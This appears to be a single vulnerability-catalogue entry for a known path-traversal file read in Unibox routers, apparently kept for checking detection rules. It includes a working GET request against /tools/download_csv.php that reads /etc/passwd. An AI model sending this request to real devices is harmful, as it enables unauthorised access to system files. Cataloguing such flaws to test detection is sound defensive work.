vendor = "Unibox"
name = "Unibox路由器任意文件读取"
type = "权限绕过"
version = "未知"
path = "/tools/download_csv.php"
detail = "GET /tools/download_csv.php?download_file=../../../etc/passwd HTTP/1.1"
fix = "缺省规则可检出，除非设备规则太烂"
date = "0703"
label = "nday"
verifier = "AdySec"
